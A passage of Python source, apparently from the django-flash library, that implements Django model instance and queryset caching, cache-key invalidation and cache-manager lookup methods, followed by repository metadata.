keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list_(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n params_list = []\n instances = []\n\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n 
instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n params = (instance.pk,)\n params_list = [params]\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n params_list.append((pk,))\n return params_list\n\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n instances = list(self.model.objects.filter(**filter_dict))\n else:\n instances = [instance]\n\n for instance in instances:\n params = []\n params_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_name in self.key_fields:\n try:\n field = self.model._meta.get_field(field_name)\n params.append(getattr(instance, field.attname))\n if (field.attname in instance_state_diff and\n 'pre' in instance_state_diff[field.attname]):\n params_pre.append(instance_state_diff[\n field.attname]['pre'])\n else:\n params_pre.append(getattr(instance, field.attname))\n except:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n ctype_field_name = field_obj.ct_field\n ctype_field_attname = self.model._meta.get_field(\n ctype_field_name).attname\n object_id_attname = field_obj.fk_field\n params.append((getattr(instance, ctype_field_attname),\n (getattr(instance, object_id_attname))))\n if (object_id_attname in instance_state_diff and\n 'pre' in instance_state_diff[object_id_attname]):\n params_pre.append((\n getattr(instance, ctype_field_attname),\n instance_state_diff[object_id_attname]['pre']))\n else:\n params_pre.append((\n getattr(instance, ctype_field_attname),\n getattr(instance, object_id_attname)))\n continue\n raise\n params_list.append(params)\n if params_pre != params:\n params_list.append(params_pre)\n return params_list\n\n\nclass InstanceCache(six.with_metaclass(InstanceCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when an instance of a model is cached on\n some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) select_related: list of related instances (attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n cache_type = 'InstanceCache'\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @classmethod\n def register_related_caches(cls):\n cls.related_caches = {}\n if not hasattr(cls, 'select_related'):\n return\n for relation in cls.select_related:\n class_name = '%s__%s' % (cls.__name__, relation)\n # Create new RelatedInstanceCache class dynamically\n related_cache_class = type(class_name, (RelatedInstanceCache,), {\n 'model': cls.model,\n 'key_fields': cls.key_fields,\n 'relation': relation,\n 'version': cls.version,\n 'timeout': cls.timeout,\n })\n # And store it's instance in related_caches\n cls.related_caches[relation] = related_cache_class\n\n @instancemethod\n def get_cache_model(self):\n return self.model\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_extra_keys(self, *args, **kwargs):\n \"\"\" Returns the keys from assosiated related cache classes\n for given params.\n \"\"\"\n if 
not hasattr(self, 'select_related'):\n return\n keys = []\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n return keys\n\n def get_instance(self, **filter_dict):\n \"\"\" Returns the instance of model.\n Can be overriden in derived classes.\n \"\"\"\n try:\n return self.get_queryset().get(**filter_dict)\n except self.model.DoesNotExist:\n if self.is_simple:\n # Returning the None so that it gets cached.\n return None\n # If there is some problem with storing\n # DoesNotExist as None in cache, then comment upper return\n # and uncomment below return\n # return DontCache(None)\n raise\n except:\n raise\n\n def remove_fk_instances(self, instance):\n \"\"\" Removes all related instances through fields on instance\n before the instance gets saved in cache\n \"\"\"\n if instance is None:\n return\n\n for prop in flash_properties[instance.__class__]:\n attr = '_%s_cache' % prop\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n for field in instance._meta.fields:\n if field.rel:\n attr = '_%s_cache' % field.name\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n instance = self.get_instance(**params)\n return instance\n\n def pre_set_process_value(self, instance, *args, **kwargs):\n instance_clone = copy.copy(instance)\n self.remove_fk_instances(instance_clone)\n return instance_clone\n\n def get_extra_key_value_dict(self, instance, *args, **kwargs):\n \"\"\" Returns the key value dict from relations given in select_related\n for given instance. Used when instance is saved in cache.\n \"\"\"\n if instance is None:\n return\n if self.related_caches:\n key_value_dict = {}\n for relation in self.related_caches:\n related_value = instance\n for field_name in relation.split('__'):\n related_value = getattr(related_value, field_name)\n related_cache = self.related_caches[relation]\n related_key = related_cache.get_key(*args, **kwargs)\n key_value_dict[related_key] = related_value\n return key_value_dict\n\n def post_process_value(self, instance, key_value_dict, *args, **kwargs):\n \"\"\" Patches all related instances got from cache in key_value_dict\n to instance.\n \"\"\"\n if instance is None:\n if self.is_simple:\n cache_model = self.get_cache_model()\n raise cache_model.DoesNotExist(\n \"%s matching query does not exist.\" %\n cache_model._meta.object_name)\n return instance\n if not hasattr(self, 'select_related'):\n return instance\n if key_value_dict is None:\n return instance\n keys = []\n relation_keys = {}\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n relation_keys[relation] = key\n\n for relation in self.select_related:\n key = relation_keys[relation]\n if not key in key_value_dict:\n continue\n value = key_value_dict[key]\n last_field_name = None\n related_value = instance\n for field_name in (relation.split('__') + [None]):\n if field_name is None:\n setattr(related_value, last_field_name, value)\n else:\n if last_field_name:\n if not hasattr(related_value, last_field_name):\n break\n related_value = getattr(related_value, last_field_name)\n last_field_name = field_name\n return instance\n\n\nclass RelatedInstanceCacheMeta(InstanceCacheMeta):\n \"\"\" Meta class for RelatedInstanceCache\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = 
super(RelatedInstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedModelInvalidationCache(object):\n \"\"\" Mixin class used in RelatedInstanceCache, RelatedQuerysetCache\n \"\"\"\n def _get_invalidation_models(self):\n return [self.model] + self.rel_models.keys()\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n key_params_list = []\n\n key_fields_attname = []\n for field_name in self.key_fields:\n field = self.model._meta.get_field(field_name)\n key_fields_attname.append(field.attname)\n\n if isinstance(instance, self.model):\n # get all values in instance assosiated with\n # key_fields and put in params list.\n field_values = []\n field_values_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_attname in key_fields_attname:\n value = getattr(instance, field_attname)\n field_values.append(value)\n if field_attname in instance_state_diff and (\n 'pre' in instance_state_diff[field_attname]):\n field_values_pre.append(instance_state_diff[field_attname]['pre'])\n else:\n field_values_pre.append(value)\n key_params_list.append(tuple(field_values))\n if field_values_pre != field_values:\n key_params_list.append(tuple(field_values_pre))\n\n for rel_model in self.rel_models:\n if isinstance(instance, rel_model):\n filter_dict = {\n self.rel_models[rel_model]: instance,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n key_params_list.append((instance.id,))\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n key_params_list.append((pk,))\n else:\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n return key_params_list\n\n\n\nclass 
RelatedInstanceCache(six.with_metaclass(RelatedInstanceCacheMeta,\n InstanceCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when an instance through a related field is cached on\n some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedInstanceCache'\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_instance(self, **filter_dict):\n dep_instance = self.get_queryset().select_related(\n self.relation).get(**filter_dict)\n instance = dep_instance\n for rel_attr in self.relation.split('__'):\n instance = getattr(instance, rel_attr)\n return instance\n\n\nclass QuerysetCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class of QuerysetCache class\n \"\"\"\n queryset_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(QuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n cls.queryset_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_result) ==\n six.get_unbound_function(QuerysetCache.get_result)):\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n return ncls\n\n\nclass QuerysetCache(six.with_metaclass(QuerysetCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its\n descendent queryset of a model is cached on some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n cache_type = 'QuerysetCache'\n\n caching_model_instances = True\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n if self.caching_model_instances:\n return self.model\n return None\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_result(self, **params):\n \"\"\" By default returns the filter queryset's result\n \"\"\"\n return list(self.get_queryset().filter(**params))\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n result = self.get_result(**params)\n return result\n\n\nclass RelatedQuerysetCacheMeta(QuerysetCacheMeta):\n \"\"\" Meta class of RelatedQuerysetCache class\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedQuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = 
ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedQuerysetCache(six.with_metaclass(RelatedQuerysetCacheMeta,\n QuerysetCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its descendent\n queryet through a related field is cached on some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedQuerysetCache'\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_result(self, **params):\n qset = self.get_queryset().filter(**params).select_related(\n self.relation)\n return list([getattr(i, self.relation) for i in qset])\n\n\nclass QuerysetExistsCache(QuerysetCache):\n \"\"\" QuerysetCache derived class to cache existance of instances\n \"\"\"\n caching_model_instances = False\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_result(self, **params):\n return self.get_queryset().filter(**params).exists()\n\n def post_process_value(self, value, *args, **kwargs):\n \"\"\" It's defined cause cache retuned values are integers (0 or 1)\n It converts them to boolean\n \"\"\"\n if value is None:\n return value\n return bool(value)\n\n\nclass CacheManager(six.with_metaclass(ABCMeta, object)):\n \"\"\" Base class for model or non model based cache managers\n \"\"\"\n\n\nclass CachedReverseSingleRelatedObjectDescriptor(\n ReverseSingleRelatedObjectDescriptor):\n def __init__(self, field_with_rel, cache_class):\n super(CachedReverseSingleRelatedObjectDescriptor, self).__init__(\n field_with_rel)\n self.cache_class = cache_class\n\n def __get__(self, instance, instance_type=None):\n if instance is None:\n return self\n try:\n return getattr(instance, self.cache_name)\n except AttributeError:\n val = getattr(instance, self.field.attname)\n if val is None:\n # If NULL is an allowed value, return it.\n if self.field.null:\n return None\n raise self.field.rel.to.DoesNotExist\n rel_obj = self.cache_class.get(val)\n setattr(instance, self.cache_name, rel_obj)\n return rel_obj\n\ndef patch_related_object_descriptor(model, key, cache_class):\n orig_key = '_%s_using_db' % key\n setattr(model, orig_key, getattr(model, key))\n setattr(model, key, CachedReverseSingleRelatedObjectDescriptor(\n model._meta.get_field(key), cache_class))\n\n\nclass ModelCacheManagerMeta(ABCMeta):\n \"\"\" Meta class for ModelCacheManager\n \"\"\"\n model_cache_managers = {}\n model_cached_foreignkeys = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n own_attrs = args[2]\n model = own_attrs['model']\n\n if model in 
cls.model_cache_managers:\n # Commenting assertion due to some module reloading bug\n # assert False, \"More than one ModelCacheManager can't be defined for %s\" % (\n # model,)\n return cls.model_cache_managers[model]\n\n if hasattr(model, 'CacheMeta'):\n cachemeta_attrs = {}\n for key, value in model.CacheMeta.__dict__.items():\n if not key.startswith('_'):\n cachemeta_attrs[key] = value\n\n mergable_keys = [\n 'get_key_fields_list',\n 'filter_key_fields_list',\n 'cached_foreignkeys'\n ]\n\n for key, value in cachemeta_attrs.items():\n if key in mergable_keys:\n if (isinstance(value, (tuple, list)) and\n key in own_attrs and\n [i for i in value if i in own_attrs[key]]):\n assert False, \"`%s` in CacheMeta and %s should not have common values\" % (\n key, args[0])\n own_attrs[key] = cachemeta_attrs[key] + own_attrs.get(key, [])\n elif key in own_attrs:\n assert False, \"`%s` can't be defined in both CacheMeta and %s\" % (\n key, args[0])\n else:\n own_attrs[key] = cachemeta_attrs[key]\n\n ncls = super(ModelCacheManagerMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n ncls_instance = ncls()\n\n # register instance of new ModelCacheManager class\n cls.model_cache_managers[model] = ncls_instance\n\n # register all simple_instance_cache_classes\n # and simple_queryset_cache_classes so that `get` and `filter` methods\n # of model cache manager can decide which cache class to be used\n ncls.instance_cache_classes = []\n ncls.simple_instance_cache_classes = {}\n\n if hasattr(ncls_instance, 'get_key_fields_list'):\n # create instance_cache_classes for assosiated model\n ncls_instance.register_instance_classes()\n\n for instance_cache_class in InstanceCacheMeta.instance_cache_classes[\n model]:\n ncls.instance_cache_classes.append(instance_cache_class)\n if instance_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(instance_cache_class.key_fields))\n ncls.simple_instance_cache_classes[\n key_fields_sorted] = instance_cache_class\n\n ncls.queryset_cache_classes = []\n ncls.simple_queryset_cache_classes = {}\n\n if hasattr(ncls_instance, 'filter_key_fields_list'):\n # create queryset_cache_classes for assosiated model\n ncls_instance.register_queryset_classes()\n\n for queryset_cache_class in QuerysetCacheMeta.queryset_cache_classes[\n model]:\n ncls.queryset_cache_classes.append(queryset_cache_class)\n if queryset_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(queryset_cache_class.key_fields))\n ncls.simple_queryset_cache_classes[\n key_fields_sorted] = queryset_cache_class\n\n if hasattr(ncls_instance, 'cached_foreignkeys'):\n cls.model_cached_foreignkeys[model] = ncls_instance.cached_foreignkeys\n\n return ncls\n\n @classmethod\n def create_cache_managers_from_models(cls):\n for model in get_models():\n if (not model in cls.model_cache_managers and\n hasattr(model, 'CacheMeta')):\n cache_manager_name = 'Auto%sCacheManager' % model.__name__\n type(cache_manager_name, (ModelCacheManager,), {\n 'model': model})\n\n\n @classmethod\n def patch_cached_foreignkeys(cls):\n for model, cached_foreignkeys in cls.model_cached_foreignkeys.items():\n for key in cached_foreignkeys:\n try:\n rel_model = model._meta.get_field(key).rel.to\n rel_model_pk_name = rel_model._meta.pk.name\n cache_class = rel_model.cache.get_cache_class_for(\n rel_model_pk_name)\n patch_related_object_descriptor(\n model, key, cache_class)\n except CacheNotRegistered:\n assert False, (\"Cached foreignkey can't be made on field \"+\n \"`%s` of %s. 
Because %s is not cached on \"+\n \"it's primary key\") % (\n key, model, model._meta.get_field(key).rel.to)\n\n\n @classmethod\n def get_model_cache_manager(cls, model):\n \"\"\" Returns the cache manager assosiated with given model\n \"\"\"\n if model not in cls.model_cache_managers:\n # If some model cache manager class is not defined for given\n # model then create it dynamically\n class_name = 'Auto%sCacheManager' % model.__name__\n type(class_name, (ModelCacheManager,), {\n 'model': model})\n return cls.model_cache_managers[model]\n\n\nclass CacheNotRegistered(Exception):\n def __init__(self, model, key_fields):\n msg = ('No cache registered for model `%s` on fields '+\n '`%s`') % (str(model), str(tuple(key_fields)))\n super(CacheNotRegistered, self).__init__(msg)\n\n\nclass ModelCacheManager(six.with_metaclass(ModelCacheManagerMeta,\n CacheManager)):\n version = 0\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n @abstractproperty\n def model(self):\n pass\n\n def register_instance_classes(self):\n \"\"\" Create InstanceCache classes dynamically\n for each pair in get_key_fields_list.\n \"\"\"\n for key_fields in self.get_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (InstanceCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def register_queryset_classes(self):\n \"\"\" Create QuerysetCache classes dynamically\n for each pair in filter_key_fields_list.\n \"\"\"\n for key_fields in self.filter_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (QuerysetCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def get_key_fields(self, args_or_kwargs):\n key_fields = []\n\n is_dict = False\n if isinstance(args_or_kwargs, dict):\n args_set = set(args_or_kwargs.keys())\n is_dict = True\n kwargs = args_or_kwargs\n else:\n args_set = set(args_or_kwargs)\n\n if 'pk' in args_set:\n args_set.remove('pk')\n if is_dict:\n value = kwargs.pop('pk')\n pk_field_name = self.model._meta.pk.name\n args_set.add(pk_field_name)\n if is_dict:\n kwargs[pk_field_name] = value\n\n for key in args_set:\n if key == USING_KWARG:\n continue\n try:\n field = self.model._meta.get_field(key)\n key_fields.append(field.name)\n except:\n if hasattr(self.model, key):\n field = getattr(self.model, key)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field, GenericForeignKey):\n key_fields.append(key)\n continue\n if key.endswith('_id'):\n key_fields.append(key[:-3])\n continue\n raise\n return tuple(sorted(key_fields))\n\n def get(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_query(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class(**kwargs)\n raise 
CacheNotRegistered(self.model, key_fields)\n\n def get_async(self, **kwargs):\n \"\"\" await counterpart of get method\n \"\"\"\n return self.get_query(**kwargs).resolve_async()\n\n def get_async_or_none(self, **kwargs):\n from .loader import object_or_none\n return object_or_none(self.get_async(**kwargs))\n\n def get_async_or_404(self, **kwargs):\n from .loader import object_or_404\n return object_or_404(self.get_async(**kwargs))\n\n def get_cache_class_for(self, *args):\n \"\"\" Find the instance_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_key(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get_key result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get_key(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_query(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter_async(self, **kwargs):\n \"\"\" await counterpart of filter method.\n \"\"\"\n return self.filter_query(**kwargs).resolve_async()\n\n def filter_cache_class_for(self, *args):\n \"\"\" Find the queryset_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_or_404(self, **kwargs):\n \"\"\" If the get result is not found raises 404.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n raise Http404('No %s matches the given query.' 
%\n self.model._meta.object_name)\n\n def get_or_none(self, **kwargs):\n \"\"\" If the get result is not found returns None.\n \"\"\"\n try:\n return self.get(**kwargs)\n except self.model.DoesNotExist:\n return None\n", "repo_name": "HackerEarth/django-flash", "sub_path": "flash/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 58925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.cache.caches", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.get_models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.apps.apps.get_models", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.generic.GenericForeignKey", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.cache.get_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "flash.settings.CACHE_NAME", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 78, "usage_type": "call"}, {"api_name": "six.python_2_unicode_compatible", "line_number": 87, "usage_type": "attribute"}, {"api_name": "six.with_metaclass", "line_number": 128, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 128, "usage_type": "argument"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 162, "usage_type": "name"}, {"api_name": "flash.models.CacheDynamicVersion.objects.get_version_of", "line_number": 171, "usage_type": "call"}, {"api_name": "flash.models.CacheDynamicVersion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flash.models.CacheDynamicVersion", "line_number": 171, "usage_type": "name"}, {"api_name": "flash.settings.WRITE_LOCK_TIMEOUT", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 194, "usage_type": "name"}, {"api_name": "flash.option.Some", "line_number": 237, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 239, "usage_type": "name"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "distutils.version.StrictVersion", "line_number": 371, "usage_type": "call"}, {"api_name": "django.get_version", "line_number": 371, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_unless_managed", "line_number": 372, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 372, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 402, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 415, "usage_type": "name"}, {"api_name": "flash.settings.DONT_USE_CACHE", 
"line_number": 426, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 426, "usage_type": "name"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory.get_loader_for", "line_number": 437, "usage_type": "call"}, {"api_name": "thread_context.dataloader_context.DataLoadersFactory", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.FlashCacheLoader", "line_number": 437, "usage_type": "name"}, {"api_name": "loader.load", "line_number": 438, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 501, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 507, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 508, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 533, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 546, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 553, "usage_type": "name"}, {"api_name": "flash.settings.db_discoverer_func", "line_number": 558, "usage_type": "call"}, {"api_name": "flash.settings", "line_number": 558, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 573, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 577, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 621, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 622, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache.get_for_model", "line_number": 628, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects_cache", "line_number": 628, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 628, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 640, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 640, "usage_type": "name"}, {"api_name": "flash.utils.memcache_key_escape", "line_number": 656, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 663, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 673, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 674, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 756, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 757, "usage_type": "argument"}, {"api_name": "six.with_metaclass", "line_number": 781, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 795, "usage_type": "name"}, {"api_name": "flash.utils.flash_properties", "line_number": 866, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 883, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1057, "usage_type": "call"}, {"api_name": 